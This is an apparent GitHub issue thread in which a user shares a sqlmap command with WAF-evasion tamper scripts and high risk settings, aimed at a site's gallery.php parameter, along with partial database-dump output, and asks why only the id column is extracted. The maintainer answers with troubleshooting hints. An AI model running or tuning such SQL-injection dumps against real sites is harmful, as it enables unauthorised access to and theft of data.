### ISSUE TITLE
Issue with dumping full database columns.

### ISSUE THREAD

**Issue by rko4all** [sqlmapproject/sqlmap#4373]
Hello Guys using sqlmap , I have accessed a database and using --is-dba , I know that the user IS NOT database admin and also using --privileges , I know that the privileges is USAGE . Now I want to know is this the reason that sqlmap is only dumping the ID column of the table?

    current user is DBA: False
    [12:57:03] [INFO] fetching database users privileges
    [12:57:03] [DEBUG] used SQL query returns 1 entry
    [12:57:03] [DEBUG] performed 0 queries in 0.01 seconds
    database management system users privileges:
    [*] 'ch8yluf9_cms'@'localhost' [1]:
        privilege: USAGE
    
    [12:57:03] [INFO] fetching database names
    [12:57:03] [DEBUG] used SQL query returns 2 entries
    [12:57:03] [DEBUG] performed 0 queries in 0.02 seconds
    available databases [2]:
    [*] ch8yluf9_cms
    [*] information_schema

Here is the command I'm using :

    python sqlmap.py -u 'https://URL.com/gallery.php?id=5' --identify-waf --tamper=between,randomcase,space2comment -v 3 --random-agent --level 5 --risk 3 -D ch8yluf9_cms -T details --dump --batch

The output I'm getting is like :

    [57 entries]
    +----+
    | id |
    +----+
    | 1  |
    | 2  |
    | 3  |
    | 4  |
    | 5  |
    | 6  |
    | 7  |
    | 8  |
    | 9  |
    | 10 |
    | 11 |
    | 12 |
    | 13 |
    | 14 |
    | 15 |
    | 16 |

For some reasons , sqlmap is only getting the ID column of the table . Is this because of lack of permissions ? If so , how come it can get all the tables name ? I'm sorry if it sounds dumb but I'm trying to learn . Thank you .

**Comment by stamparm** [comment]
Everything is missing from here. No useful information.

1) You are using three different tamper scripts, so I assume that there is some WAF in between (maybe blocking requests for getting the proper column names)
2) There is no mention on the techniques available. Please rerun everything with `--parse-errors` or `-t traffic.txt`. Maybe you'll find some useful information
3) There is no mention on how did you get the column names. If there was a privilege problem with access to `information_schema` (this would explain everything), then maybe you've run the `--common-columns` or similar. I don't like playing guessing games. Closing this down as invalid
